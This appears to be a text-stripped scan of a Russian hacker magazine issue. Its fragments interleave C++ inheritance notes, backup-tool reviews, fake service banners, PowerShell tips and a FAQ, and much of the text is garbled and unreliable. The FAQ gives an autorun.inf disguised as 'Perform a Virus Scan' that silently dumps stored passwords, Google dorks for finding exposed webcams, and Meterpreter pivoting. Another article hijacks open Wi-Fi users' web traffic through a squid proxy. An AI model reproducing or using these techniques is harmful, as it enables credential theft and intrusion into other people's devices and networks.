. , B D, D
, B. ,
,
B,
D, D B.
, D,
B , D
B, .
.


. ,
,
.
-
class Person {...};
class Student: public Person {...};
void eat (const Person &p);
//
void study (const Student &s);
//

Person p;
Student s;
eat(p);
// , p
eat(s);
// , s ,
//
study(s);
//
study(p);
// ! p

.
,
,
,

- ,
.


, .
:
. . C++
:

class Bird {
public:
virtual void fly();
//

};
//
class Penguin: public Bird {

};

.
, ,
.
.
, .
.

class Bird {
public:

// - fly

};
class FlyingBird: public Bird {
public:
virtual void fly();

};
class Penguin: public Bird {

// - fly
};


, , , .
, . fly() ,
.

void error(const std::string& msg);
class Penguin: public Bird {
virtual void fly()
{ error( !); }

};

, : ,
.
.
, ,
.
:


. :

//
int x;
void someFunc()
{
//
double x;
std::cin >> x;
}

, x , ,
.
x someFunc, , - . , .
x double.
.
.

class Base {
private:
int x;
public:
virtual void mf1() = 0;
virtual void mf1(int);


class Bird {
public:

virtual void mf2();


void mf3();
void mf3(double);

// - fly

};

};

class Penguin: public Bird {

// - fly
};

class Derived: public Base {


public:
virtual void mf1();
void mf3();
void mf4();

};

Penguin p;
p.fly();

// !

fly() ,
. , .
, ( ) ,
.
.
,
, , ,
. C++
- , .

Derived d;
int x;

d.mf1();     // fine, calls Derived::mf1
d.mf1(x);    // error! Derived::mf1 hides Base::mf1
d.mf2();     // fine, calls Base::mf2
d.mf3();     // fine, calls Derived::mf3
d.mf3(x);    // error! Derived::mf3 hides Base::mf3

, mf3,
, , .
C++-.

, mf1 mf3
.
, Base::mf1 Base::mf3
Derived. ,
, , .
, ,
. ,

. using:
using-
class Base {
private:
    int x;
public:
    virtual void mf1() = 0;
    virtual void mf1(int);
    virtual void mf2();
    void mf3();
    void mf3(double);
};
class Derived: public Base {
public:
    // make everything named mf1 and mf3 in Base
    // visible (and public) in Derived
    using Base::mf1;
    using Base::mf3;
    virtual void mf1();
    void mf3();
    void mf4();
};
Derived d;
int x;

d.mf1();     // fine, calls Derived::mf1
d.mf1(x);    // fine now, calls Base::mf1
d.mf2();     // fine, calls Base::mf2
d.mf3();     // fine, calls Derived::mf3
d.mf3(x);    // fine now, calls Base::mf3

, . ,


,
using- , .

:
.

.
, ,
, ,
( , ) .
,
.
.

class Shape {
public:
    virtual void draw() const = 0;
    virtual void error();
    int objectID() const;
};
class Rectangle: public Shape {};
class Ellipse: public Shape {};

, : ,
. .
,
, ,
.
, .
draw() . ,

.
Shape
draw
.
, ,
,
:
, .
.
error(), .
,
, .

, .
Shape .
(Triangle).

-. - ,
,
.
Triangle
class Shape {
public:
    ...
    virtual void error();
    ...
};
class Triangle: public Shape {
    // ,
    virtual void error();
};
Shape *tr = new Triangle;
// Shape::error(),
tr->error();

, -
,
.
.
, error ,
-.
:

class Shape {
public:
    virtual void error();

protected:
    void defaultError();
};
void Shape::defaultError()
{
    // default error handling
}
class Rectangle: public Shape {
public:
    virtual void error() {defaultError();}
};
class Ellipse: public Shape {
public:
    virtual void error() {defaultError();}
};
class Triangle: public Shape {
public:
    virtual void error();
};
void Triangle::error()
{
    // error handling specific to Triangle
}


, , .
, ,
. .

C++ ,
,
.
. 2
class Shape {
public:
    virtual void error() = 0;
};
// implementation of the pure virtual function
void Shape::error()
{
    // default error handling
}
class Rectangle: public Shape {
public:
    virtual void error() {Shape::error();}
    ...
};
class Ellipse: public Shape {
public:
    virtual void error() {Shape::error();}
    ...
};
class Triangle: public Shape {
public:
    virtual void error();
    ...
};
void Triangle::error()
{
    // error handling specific to Triangle
}

, -
error,
. ,
, , error defaultError,
.
, objectID().
, , .
Shape ,
, Shape::objectID,
.
,
, , : ,
.

C++. , ,
,
- C++,
, . z


SYN/ACK
grinder grinder@synack.ru
urban.prankster martin@synack.ru




. , ,
:
(, , Windows), , , .
, .
BACULA
: Bacula
: bacula.org, sf.net/projects/
bacula
: Bacula
Project 5. Bacula System
Enterprise 4.
: GNU GPL
: Linux, FreeBSD, Open/Solaris
: Linux, *BSD, Open/Solaris, Mac
OS X, Win

, .
- ,
Bacula
,
, .
.

,
. ,

(, , ). Bacula ,
,
.



, .

,
.
.
,
Bacula, ,
, /
:
Director ( 9101) ,
Bacula, ,
;
Storage ( 9103) ,

( , CD/DVD,
USB );
File Daemon ( 9102) ,
Director'
Storage.
, Direct, Storage, File Daemon
Bacula
Monitor
( ) .
PostgreSQL, MySQL

SQLite. Director Storage


Linux,
FreeBSD, Open/Solaris. ,
, Windows
(32 64 bit), *BSD, Mac OS X. , Bacula
.
,
SSH ,
.
.
bconsole, BAT (Bacula Admin Tool) Qt ( Ubuntu universe) wx-console
wxWidgets. (baculagui) : bweb (- Perl
), bacula-web
(-, PHP), bimagemgr
(- CD ). ,
, Baculaconf
(baculaconf.sf.net) Webacula (Web + Bacula,
webacula.sf.net/ru).
, -,
(, ..),
,
.
Bacula
( CRAM-MD5),

TLS .
iptables 192.168.1.0/24 :
:
-A INPUT -p tcp --dport 9101:9103 -s 192.168.1.0/24 -j ACCEPT

9102 :
-A INPUT -p tcp --dport 9102 -s 192.168.1.0/24 -j ACCEPT

, Bacula, Bran (branbackup.org,


ALT Linux),
. -.

BACKUPPC
: BackupPC
: backuppc.sf.net
: GNU GPL
: Linux, *BSD, Open/Solaris
:
BackupPC . Bacula, ,
.
, .
Unix- Linux, *BSD, Open/Solaris. Unix/Linux, Mac
OS X Windows . Windows SMB,

rsync ( cygwin), Unix-


rsync, nfs tar.
BackupPC ,
:
SMB, , ,
,
rsync. (gzip/bzip2),
. , .
SSH .
, IP-.
, , .
.
,
. ,
IP,
.
BackupPC ,
.
, .
. , .
. ,
AMANDA.
config.pl (
, ).


SYN/ACK

Boxi

- Bacula Webacula
( /ServerBackupPC/
pc/computer_name).

hosts.
, ,
, ,
- (CGI),
-.
,

. -
, .
BackupPC Perl,
:
Compress::Zlib, Archive::Zip File::RsyncP.
, Samba
Apache.
3.1.0
( 2007 ), 3.2.0beta0 ( 2009),
.

BOX BACKUP
: Box Backup
: boxbackup.org

: BSD
: Linux, *BSD, Open/Solaris, Mac
OS X
: Linux, *BSD, Open/Solaris, Mac
OS X, WinXP/2k3/Vista
Box
Backup ,
. ,
,

, , CD/DVD .

.
,

. ,
.
(snapshot),

(rsync).
, Box Backup , ,
.
, - (
)
. , Box Backup

vs

,
. .
.
.
, ,
, ( ).
.


.
, .

, . ,
MP3 ,
:
ExcludeFilesRegex = .*\.(mp3|MP3)$

Box Backup -
: bbstored, ,
bbackupd,

, bbackupquery,

. ,
, ,

,
.

OpenBSD Linux, Box Backup
Free/NetBSD, Mac OS X, Solaris.
, ,
Windows.
Box Backup
.
TLS/
SSL . , bbstored-certs,
.

AES, Blowfish,
, , .
, (
, ) .
,
,
, .
,


- BackupPC
. Boxi (boxi.sf.net),

wxWidgets.
.

Windows. - Boxbackup-Explorer (joonis.de/boxbackup-explorer),

.
0.10 (
2006 ), . : 2 .
, 0.11rc5 ( 2009),
,
.

AMANDA
: AMANDA
: amanda.org, sf.net/projects/amanda
: Freeware
: Linux, *BSD, Open/Solaris, Mac OS X
: Linux, *BSD, Open/Solaris, Mac OS X,
WinXPSP2/2k3SP2/VistaSP1/2k8R2/7
AMANDA (Advanced Maryland Automatic Network Disk
Archiver) ,
Maryland
().
Sourceforge, freeware
, , ,
.
AMANDA
, *nix- .
, AMANDA
dump/restore ( XFS xfsdump), GNU tar,
compress, gzip ,
.
AMANDA , CD/
DVD -.
, ,
.
AMANDA dump tar.
ext2/3, ZFS XFS ,
,

BackupPC Web-
CGI,

INFO
tar, ,

.
AMANDA - .
,
,
, .
, Windows SMB.
Zmanda Windows Client 2.6.x (wiki.
zmanda.com/index.php/Zmanda_Windows_Client), Win32 API
Volume Shadow Services
( VSS ][ 2008
).
: WinXPSP2/2k3SP2/VistaSP1/2k8R2 Se7en.
- (cs.ait.ac.th/laboratory/amanda),
Windows
.

,
UDP TCP.
:
Kerberos 4/5, OpenSSH, rsh, bsdtcp, bsdudp Samba. , Windows
bsdtcp.
"-auth=bsdtcp". , inetd:
amanda stream tcp nowait amanda /usr/lib/amanda/amandad amandad -auth=bsdtcp amdump

, disklist, , ,
:
auth "bsdtcp"

, .
10080/UDP 10081/
TCP, Kerberos.
.

info
VSS
,
][
03.2008.

HTTP://WWW
links
Bacula: bacula.org, sf.net/projects/bacula
Webacula: webacula.sf.net/ru
BackupPC: backuppc.sf.net
BoxBackup: boxbackup.org
Boxi: boxi.sf.net
AMANDA: amanda.org, sf.net/projects/amanda
Zmanda Windows Client: wiki.zmanda.com/index.php/Zmanda_Windows_Client


SYN/ACK

Bacula - BAT
AMANDA . , ,

.
GPG, , , , (amcrypt, GPG
..) .
:

Bacula Ubuntu

kencrypt yes

, .
,
.
cron .
,
. , . ,
AMANDA
. , ,
. Amanda Enterprise Edition
GUI (Zmanda Management Console),
.


AMANDA ,
amrecover, , , ,
: ,
, , . ,
.

,
,
. ,
,
.
, ,
.z

SYN/ACK
j1m@synack.ru


, ,
, , , ,
,
, ,
.


:
1. .
-,
,
.
,

, .
2. -.
,

. ,
.
, , . :
, ,
.
3. .

. , -,
,
, ,

( ).
,

,
.



, , ,

.
.
, ,
,
.
,
, , : ftpd, smtpd
httpd, dns. ,

, ProFTPd, ,
, vsftpd,

:
* ProFTPd. In /etc/proftpd.conf, set ServerName to "Welcome to Micro-FTPd 0.23 (OS/2 3.3)".
* vsftpd. In /etc/vsftpd/vsftpd.conf, add the line "ftpd_banner=Welcome to OnixFTPD (version: 22.1, OS: 386BSD 4.3)".
* LigHTTPd. In /etc/lighttpd.conf, set server.tag to "MicrosoftIIS/3.3.3.3.3".
* Sendmail. In /etc/mail/sendmail.mc, add the line:
define(`confSMTP_LOGIN_MSG', `exchange.srv.local Microsoft MAIL Service, Version: 6.0.3790.1830 ready')dnl
Then rebuild the configuration:
# cd /etc/mail
# m4 sendmail.mc > sendmail.cf
* Postfix. In /etc/postfix/main.cf, set smtpd_banner to "VAX HTTPD 3.31-beta (MS-DOS 5.3, gcc 1.1)".
* Bind. In /etc/bind/named.conf, add:
options {
    version "8.2.2";
};
: BIND 8.2.2
, ,

DNS-, DoS-
root.
.

, ,
Apache

include/ap_release.h (
#define AP_SERVER_BASEPRODUCT "Apache").
, , .
honeypot-, .
smtp-, , :
$ vi fake-smtpd.pl
#!/usr/bin/perl
use Socket;
$port=25;
$hostname="host.com";
# SMTP reply lines end with CRLF
$banner="220 host.com ESMTP Sendmail 8.6.1/8.5.0\r\n";
$fail="500 Command unrecognized:";
[ skipped ]
    ($af,$port,$inetaddr)=unpack($sockaddr,$addr);
    @inetaddr=unpack('C4',$inetaddr);
    ($i1,$i2,$i3,$i4)=@inetaddr;
    $ipaddr="$i1.$i2.$i3.$i4";
    print "connected from $ipaddr\n";
    print NS $banner;
    while(<NS>) {
        if (/EHLO/i) {
            print NS "Hello $ipaddr. nice to meet you\r\n";
        } else {
            print NS "$fail $_\r";
            print "tried $_";
        }
    }
    print "$ipaddr disconnected\n";
}

, ,
, . ,
, .
, ,

-? ,
.
( HTTPd),
,
. Nmap : ,
,
(TCP UDP, ..) , .
, , :
# iptables -P INPUT DROP
# iptables -A PREROUTING -t nat -p tcp ! --dport 80 \
-j REDIRECT --to-port 80
# iptables -A INPUT -p tcp --syn --dport 80 \
-m connlimit ! --connlimit-above 10 -j ACCEPT

, 80, 80- . 10. , web-


DoS.
web- -
. ,
slashdot- ( - ),
, web-.


SYN/ACK

SMTP- SMTP

Apache
( ), .
,
.
.htaccess
:
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^http://www\.evil\.net [NC]
RewriteRule .* http://www.google.com [R]


HTTP_REFERER
,
www.evil.net ([NC]
no case: URL
).
,
,
( google.com,
).
, .
Wi-Fi
,

, Wi-Fi ,
.
: ,
/
, - . ,
, ,
.
www.ex-parrot.com/pete/
upside-down-ternet.html,


. : ,
,

, .
, .
DHCP-,
.
,
.
dhcpd.
conf:
# vi /etc/dhcpd.conf
### Global options
ddns-updates off;
ddns-update-style interim;
authoritative;
shared-network local {
    ### Subnet for known clients
    subnet *.*.*.* netmask 255.255.255.0 {
        range *.*.*.* *.*.*.*;
        option routers *.*.*.*;
        option subnet-mask 255.255.255.0;
        option domain-name "mydomain.ru";
        option domain-name-servers *.*.*.*;
        deny unknown-clients;
        ### Known client
        host client1 {
            ### Bind the MAC address to an IP address
            hardware ethernet *:*:*:*:*:*;
            fixed-address *.*.*.*;
        }
    }

    ### Subnet for unknown clients
    subnet 192.168.0.0 netmask 255.255.255.0 {
        range 192.168.0.2 192.168.0.10;
        option routers 192.168.0.1;
        option subnet-mask 255.255.255.0;
        option domain-name-servers 192.168.0.1;
        allow unknown-clients;
    }
}

dhcpd:
$ sudo service dhcpd restart

squid,
HTTP-,
:
$ sudo apt-get install squid

/etc/
squid/squid.conf ( ):
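# vi /etc/squid/squid.conf
### Allow access from the 192.168.0.0/24 subnet
acl localnet src 192.168.0.0/24
http_access allow localnet
### Run as a transparent proxy
http_port 3128 transparent
### Pass every requested URL through the rewriter
url_rewrite_program /usr/local/bin/flip.pl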

flip.pl, :
# vi /usr/local/bin/flip.pl
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while (<>) {
    chomp $_;
    if ($_ =~ /(.*\.jpg)/i) {
        $url = $1;
        # fetch the image, flip it, and point the client at the local copy
        system("/usr/bin/wget", "-q", "-O", "/var/www/images/$pid-$count.jpg", "$url");
        system("/usr/bin/mogrify", "-flip", "/var/www/images/$pid-$count.jpg");
        print "http://127.0.0.1/images/$pid-$count.jpg\n";
    }
    elsif ($_ =~ /(.*\.gif)/i) {
        $url = $1;
        system("/usr/bin/wget", "-q", "-O", "/var/www/images/$pid-$count.gif", "$url");
        system("/usr/bin/mogrify", "-flip", "/var/www/images/$pid-$count.gif");
        print "http://127.0.0.1/images/$pid-$count.gif\n";
    }
    else {
        # anything else is passed through unchanged
        print "$_\n";
    }
    $count++;
}

flip.pl

xakep.ru -, , google.com

):

:
$ sudo chmod +x /usr/local/bin/flip.pl

squid :
$ sudo service squid reload

-, , :

$ sudo usermod -aG proxy www-data

INFO

-:
$ sudo service apache2 restart

, iptables:
$ sudo iptables -t nat -A POSTROUTING \
-j MASQUERADE
$ sudo iptables -t nat -A PREROUTING -p tcp \
--dport 80 -j REDIRECT --to-port 3128

. HTTP-,
, squid
, , -,
/var/www/images
-. ,
- -.


. ,
.
, .
Postfix, ,
,
,
. filter,
:

info

,

bash

.

!
(][_11_2009),

.

DVD
dvd



fake-smtpd.pl
flip.pl.

$ sudo adduser filter


$ sudo apt-get install apache2

:
$ sudo mkdir /var/www/images
$ sudo chown www-data:www-data /var/www/images
$ sudo chmod 755 /var/www/images

- ,
www-data proxy (

, :
$ sudo mkdir /var/spool/filter
$ sudo chown filter:filter /var/spool/filter

.
/etc/
postfix/master.cf.


SYN/ACK

BIND

filter unix - n n - 10 pipe
  flags=Rq user=filter argv=/usr/local/bin/mail-filter.sh

$ sudo chmod +x /usr/local/bin/mail-filter.sh

:
mail-filter.sh :
$ sudo service postfix reload
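# vi /usr/local/bin/mail-filter.sh
#!/bin/sh
### Spool directory and sendmail command
INSPECT_DIR=/var/spool/filter
SENDMAIL="/usr/sbin/sendmail -i"
### Exit codes from <sysexits.h>
EX_TEMPFAIL=75
EX_UNAVAILABLE=69
### Clean up when done or when aborting
trap "rm -f in.$$" 0 1 2 3 15
### Change to the spool directory
cd "$INSPECT_DIR" || exit $EX_TEMPFAIL;
### Save the message to a file
cat > in.$$ || exit $EX_TEMPFAIL;
### Append the text to the saved message
echo "---\n ..." >> in.$$
### Hand the message back to sendmail
$SENDMAIL "$@" < in.$$
exit $?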


smtpd
pipe (
). echo
( ...)
sendmail. (postfix - postfix).
,
IP- DNS-,
,
- www.bibigon.com.
google.com,
html-, -
80-
-, google.
com .
Samba CUPS,
, .

, , .
, . ,
. z

SYN/ACK
Nathan Binkert nat@synack.ru


CyberBook S855:
DESTEN
> :
Intel
965GM
Intel
ICH8M
> :
2 SODIMM
DDR2
800/667 SDRAM
4
> :
2.5" SATA HDD,
80-320
> :
15.4" WXGA (1280x800)

>> SYN/ACK


CyberBook S855

> :
Intel Graphics Media Accelerator GMA X3100
( 358 )

> ( ):
Intel Core 2 Duo 2.1-2.8 FSB 800 , 3-6

Intel Celeron M 1.73-2.26 FSB 533 , 1

> :
56K V.90 -
10/100/1000 /
Intel Pro
Wireless 4965AGN (802.11a/g)
Bluetooth 2.0, 3G ()

.
, , , , , , ,
. .
DESTEN CyberBook,

, . , , , , ,
.
S855 .

,
, .
,
.
,
- . , ,
.
,
, . .
CyberBook -


> :
- 6-
4400 / ( 3 )
- 9-
6600 / ( 4 )
> -:
3 USB 2.0
1 IEEE 1394 (4-pin)
1 Express Card 34/54
1 VGA (15-pin D-sub)
1
1
1 RJ-11 (56 Kbps V.90)
1 RJ-45 Ethernet
1 COM port (9-pin D-sub)
> :
- 4 1 (SD, MMC, MS, MS Pro)
- 1.3
88
Intel HD Audio

DVD+-RW (
)
> :
370 x 276 x 37,5~40
: 3

MIL-STD 810F.
MIL-STD-810F, 516.5,
IV. MIL-STD-810F 514.5, I.
,
IT- .
Intel Core 2 Duo,
4 ,
320 . : Ethernet-, v.92,
Wi-Fi 3G-.
40286 .

ipc2U iROBO-1000-10A2:
Intel Atom

ipc2U iROBO-1000-10A2
> :
Mini-iTX
> :
Intel Atom 1.6
> :
Intel 945GSE
> :
DDR2 SODIMM
512
2 DDR2 533
> :
2 SATA-
1 160 SATA

2 RS-232
6 USB 2.0
1 CompactFlash
> :
VGA ( DVI, VGA)

Slim DVD-RW
> :


> :
( 1U)
(xx): 483 x 43 x 220
5.5

> :
2 Gigabit Ethernet-
> :
180

>> SYN/ACK

> :
1 PCI
-:
2 PS/2

iROBO-1000-10A2 ipc2U .
,

. Intel Atom.
iROBO Intel,
,
. -,
Intel Atom SCH
, ,
( 2.5 ),
. -,
,

, , 220 ,

. -, Intel Atom , , .
, Intel Atom

. , 1.6 Intel Atom
800 Intel
Xeon, .

SATA-, 2 1.5 ( ,
DVD-

ROM). ,
, , -, .

,
, USB
.
, PCI.
-
Windows (Vista, XP Pro),
. iROBO-1000-10A2
RoHS.
512 160 700$.


SYN/ACK
grinder grinder@synack.ru

POWERSHELL 2.0
PowerShell , ,
, . : , .
, PS ,
, .


,
, .
,
. , "System.
OutOfMemoryException".

, ,
, .

. ,
, .

:
PS> Get-Process | Where {$_.ProcessName -eq "explorer"}
PS> Get-Process explorer

, .


.
,
PowerShell. ,
.
ForEach-Object ( foreach) -


foreach (
). ,

,
.
PS> $computers = Get-ADComputer
PS> foreach ($computer in $computers) { - }


:
PS> Get-ADComputer | ForEach-Object { - }


, .
(pipelines, "|")
ForEach-Object

,
, . , .
ActiveDirectory
:
PS> import-module ActiveDirectory

,
:
PS> foreach ($computer in Get-ADComputer) { $computer }


,
( ) .

,
. . , foreach ,
PS
, foreach
.
, foreach ,
, , ,
. , -,
. ,
( ,
Get-Process, , ),
. PS
: .
Tee-Object. , ,
:
PS> Get-Process | Tee-Object -filepath C:\process.txt

,
.

:
PS> Get-Process | Tee-Object -filepath C:\process.txt | Sort-Object cpu

, Out-File:
PS> Get-Process | Tee-Object -filepath C:\process.txt | Sort-Object cpu | Out-File C:\process-sort.txt

Tee-Object ,
"-inputObject".


Get-Content, Select-String, . ,
, . ,
Get-Content ,
( ). ,
100 :

Get-Content , . , Select-String
, .
, PS
PowerShell:
PS> Select-String -path *.ps1 -pattern "PowerShell"

, , :
PS> Get-Content -path *.ps1 | where {$_ -match "PowerShell"}


where, ,
. , , .
, , , (Warning, Failed ..), Success.
Select-String "notMatch"
, :

PS> Get-Content :\system.log -Read 100


PS> Select-String "Success" *.log -notMatch

,
.
Read, , "| ForEach-Object
($_) |", .
, :
PS> Get-Content biglogfile.log -read 1000 | ForEach-Object {$_} | Where {$_ -like '*x*'}

3 , :
PS> Get-Content biglogfile.log | Where {$_ -like '*x*'}

, "context",
. ,
Failed:
PS> Select-String "Failed" *.log -context 2

, Select-String
, "-caseSensitive".
,


SYN/ACK

PS
,

PS ServerManager

: , .
PS , .
Write-Host, : (-Backgroundcolor) (-Foregroundcolor).
PS> Get-Process | Write-Host -foregroundcolor DarkGreen -backgroundcolor white
. , Write-Host .
, Error,
.
PS> if ($a -eq "Error") {Write-Host $a -foregroundcolor red}
> else
> {Write-Host $a}
, , " ": Write-Warning Write-Error.
PS> Write-Error "Access denied"
,
, , Out-Host
"-paging" :
PS> Get-Process | Out-Host -paging
: Clear-Host ( ), Write-Progress ( ), Sort-Object ( ).
PS> Get-Process | Sort-Object cpu
, CPU, .
"-Descending".


Microsoft, Select-String
grep/egrep. , grep
Windows :
GnuWin32 (gnuwin32.sf.net), Windows grep
(wingrep.com), GNU Grep For Windows (steve.
org.uk/Software/grep), Grep For
Windows (grepforwindows.com, pages.interlog.
com/~tcharron/grep.html) .
grep Select-String.
> grep Warning *.log



,
, .Net.
, grep. ,
Windows findstr.exe, ,
, grep .

. PS
, ,
-,
( GetType().
FullName), . ,
.

. ,

,
. ,
,
,
:
PS> $arr = New-Object string[] 300

:
PS> $arr.GetType().Basetype

:

INFO

info

Get
EvenLog
$arr = new-object int[] 1000
for ($i=0; $i -lt 1000; $i++)
{$arr[$i] = $i*2}

10 , :
$arr = @()
for ($i=0; $i -lt 1000; $i++)
{$arr += $i*2}


PS Perl-
,
. , PS


. PS
*-Eventlog ,
, .
. ,

, "Newest"
:

,
.NET Framework ( System.Text.
RegularExpressions.Regex). "-match" "-cmatch"
(case-sensitive, ) "-imatch" (case
insensitive, ). ,
IP-,
ipconfig. :
PS> ipconfig | where {$_ -match "\d{3,}"}

PS
,
*, ?, +, \w, \s, \d .
:

Windows

PS v2.0 CTP3 Get-WinEvent,


.
, :
PS> Get-WinEvent -ListProvider *update*
Microsoft-Windows-WindowsUpdateClient {System,
Operational}

localhost, synack.ru

, :


PowerShell
][_03_2010.

(
<Tab>),
.

PS> $regex = "^[a-z]+\.[a-z]+@synack.ru$"


> If ($email -notmatch $regex) {

Microsoft-Windows-WindowsUpdateClient/
PS> Get-Eventlog Security -Newest 20 -computername


PowerShell
PowerShell

2009 .

, ,
Windows Update.
:

PS> Get-Eventlog Security -Message "*failed*"

HTTP://WWW
links

, PowerShell
microsoft.com/
powershell, blogs.
msdn.com/PowerShell

powershellcommunity.
org, pwrshell.net,
powershelltools.com,
powershell.wik.is.
Unix
Windows
gnuwin32.sf.net

PS> $provider = Get-WinEvent -ListProvider

(
EventID=4624):
PS> Get-Eventlog Security | Where-Object {$_.EventID -eq 4624}

Microsoft-Windows-WindowsUpdateClient
PS> $provider.events | ? {$_.description -match "success"} | select id,description | ft -AutoSize


Perl.
www.xakep.ru/
post/19474


SYN/ACK


, "Warning",
"!!!Warning":
PS> Get-Content -path system.log | foreach {$_ -replace "Warning", "!!!Warning"}

,
. Perl,
,
. $0 , $1 , $2 .
:
PS> Get-Content -path system.log | foreach {$_ -replace "(Warning)", '!!!$0'}

Where PowerShell
> Write-Error "Invalid e-mail address $email"
>}

, synack.ru
( ), ( Write-Error - ).
,
, (. Perl www.xakep.ru/post/19474). ,
,
.
, RegexBuddy (regexbuddy.com/powershell.html)
RegexMagic (regexmagic.com). , PS
, -replace (
-ireplace -creplace).
:
-replace "_","_"


-
, , . Microsoft
, PS Measure-Command,
.
PS CMD, COM, WMI .NET,
. .
:
PS> Measure-Command {ServerManagerCmd -query}
TotalMilliseconds: 7912,7428
PS> Measure-Command {Get-WindowsFeature}
TotalMilliseconds: 1248,9875

, PS
.

PowerShell ,
, .
. ,
. z

UNITS

Oriyana oriyana@xaker.ru

PSYCHO:

PR-

,
. , , , . ,
, . , ,
. , .

, ,

. , , ,
,
, PR-.
PR
. ,
, ,
,
, , , ,
, PR?
Public Relations ( )
, ,

. :
, , .
,
, ,
.
PR-. , ,



,
.

, . : ,
,
,
.

, ,
, .
,
,
, .
PR- ,
, .
.

: ,

. ,
, .
,
,
.

.
:
, ,
,
.
.
: , ,
, .

. .
.
, .
-
. ? :

, .
:
,

. ?
. ,
- ,

Boss
,
, , - .
-.
,
.

,
,
, .
: - ,
,
, ,
, . , , ,
, ,
.
:
.

, .

.

,
,
.
: !
18:00! 30%!.
,
.

,
PR

:
, ,
, ,
.
.
, :
- ,

. , ., , , 5:43

.
. ,

,
. :
( ,
)
, .


,

. ,
,
. , ,
, ,
.

. ,
,

. , ,
.
, ,
,

.


UNITS

Pepsi

-.
,

, ,

. .
, ,
,
.
, ? :)
:
, .
, ,
. ,
, ,
.
. ,


.
: ,

, ,
,
. ,

, ,


,
, .

: , ()
(
). : , ,
. (
). ? ,

( , )? ( ,
).
,
,
. ,
, . ,
. .
:
.
, . , ,
, .

: ,
.
: . ,
, .
.
.
-
, , .
, ,
,
. , 2-3

( ) .
, .
.
,
.
: , ,
,
. , , , 70% (
,
), 30% . ,
, ,
.
: , ,
.
,
.
, ,
, .
:
.
,
:

.
:
, : , ,
,
.
,
:
,
.
, . ,

,

: -
,
, .
,
.

.

H1N1
. .
?
.
.
: , , .
,


.
.


. ,
,

.
:

,
(, , ). -



: ( ). ( , , ,
, ) (,
, , , ) ,
,
.
, , , ,
,
, ,
.
, ,
, ( );
, (
,
,
);

, , , , ,
, ,

: ,
,
,

. , ,

.
.
, , , .
,
.
,
:

, , ,
,
.
:
. , , .
,
,
,

(
). , -

-,
.


(
, , ,
).
,
,
.
.

. : ,

, ,


UNITS

.
: ,

, . ,
?
()
, , .
(,
..)
,
. , ,
, ;
(, , ) (,
, ).
( , ). ,
,
.

. , : ,
, (
). ,

.
, : ,
,

( ).

.
.

2004

,
.
,
.
,
, ,
.
, .
, ,
.



:
,
, , .
.
.
.
, , . odnoklassniki.ru vkontakte.
ru.

.
,
, .
. ,

. , , ,
-,
, -,
VPN .
, .
, :
, ,
,
, , .
.

PR


PR-

PR-


, PR-
.

.

,
,
.
. 2004 .
.
, .

,
?
,
(
).
?
, ?
,
, , .

.
,
,
.
.

,
, ,
. .
:
( , );
,
, , (
, , );
, , , -
(,
);
, ,
;

;
, ,
.
, , ,
PSYCHO! :)z


UNITS
antitster@gmail.com

faq
united
@real.xakep.ru

Q: , .
- , . ?
A: .


, .
, ,
,
.

:
MessenPass (www.nirsoft.net/utils/mspass.
html)
: MSN Messenger,
Windows Messenger, Yahoo Messenger, ICQ,
Trillian, Miranda GAIM;
Mail PassView (www.nirsoft.net/utils/mailpv.
html)
: Outlook Express, Microsoft
Outlook 2000, Microsoft Outlook 2002/2003,
IncrediMail, Eudora, Netscape Mail, Mozilla
Thunderbird;


IE Passview (www.nirsoft.net/utils/internet_
explorer_password.html)
, Internet
Explorer-;
Protected Storage PassView (www.nirsoft.net/
utils/pspv.html) , ;
PasswordFox (www.nirsoft.net/utils/
passwordfox.html) ,
Firefox'.
,
, .
autorun.inf :
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

launch.bat:
start
start
start
start

mspass.exe /stext mspass.txt


mailpv.exe /stext mailpv.txt
iepv.exe /stext iepv.txt
pspv.exe /stext pspv.txt

start passwordfox.exe /stext


passwordfox.txt


popup "ACTION= Perform a Virus Scan",

,
.
Q: -,
?
A: Googlehack
! (www.xakep.ru/magazine/
xa/076/056/1.asp)
:

inurl:"CgiStart?page="
inurl:/view.shtml
intitle:"Live View / AXIS
inurl:view/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)

(disconnected)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:"live view" intitle:axis
intitle:liveapplet
allintitle:"Network Camera
NetworkCamera" (disconnected)
intitle:axis intitle:"video
server"
intitle:liveapplet inurl:LvAppl
intitle:"EvoCam" inurl:"webcam.
html"
intitle:"Live NetSnap Cam-Server
feed"
intitle:"Live View / AXIS"
inurl:indexFrame.shtml Axis
inurl:"MultiCameraFrame?Mode=Motio
n" (disconnected)
intitle:start inurl:cgistart
intitle:"sony network camera
site:.viewnetcam.com -www.
viewnetcam.com
intitle:"Toshiba Network Camera"
user login
intitle:"netcam live image"
(disconnected)
intitle:"i-Catcher Console Web
Monitor"

Q: -

1. meterpreter OpenSSH . ,
: packetheader.
blogspot.com/2009/01/installing-openssh-onwindows-via.html.
2. OpenSSH
Meterpreter,
8000
22
:
meterpreter> portfwd add -L
172.16.186.132 -l 8000 -r
172.16.186.128 -p 22

3. SSH-
(172.16.186.132):
# ssh -D 127.0.0.1:9000 -p 8000
username@172.16.186.132

SOCKS4-
9000 ,
SSH-.
4. PROXYCHAINS ,
nessusd SOCKS4-, 9000 (
proxychains.conf
,
):

?
A:

,
,
,
,
. ,
- ,
,
.

,
GhostBuster (ghostbuster.
codeplex.com). !
Q: .
,
(
HTTP/HTTPS-).
(172.16.186.132). meterpreter- (172.16.186.126)
(, ). - Nessus
meterpreter-?

# proxychains /usr/sbin/nessusd -D

5. Nessus- .
Q: ,
Wireshark . -
?
A: , Wireshark- ,

.
.
Wireshark Tshark.

(
tshark -h).
?

. tshark
-D.
:

A: , -

, . (
,
,
):

1. \Device\NPF_{11A468B6-C06545F6-AB32-D69695A6F601} (MS Tunnel


Interface Driver)
2. \Device\NPF_{A16900A3-020C4B05-B430-4CD67527C189} (Realtek

RTL8168B/8111B PCI-E Gigabit


Ethernet NIC)

:
tshark -i 2 -wexample.pcap -f "tcp[13] = 0x14",

-i ;
-w , ;
-f , libpcap ( ,
tcp 13- 0x14, RST ACK).
www.
cs.ucr.edu/~marios/ethereal-tcpdump.pdf
www.tcpdump.org/tcpdump_man.html.
, <Ctrl-C>.
example.pcap Wireshark
, , .
Q: ,

, ,
?
A: ,
,
IDA:
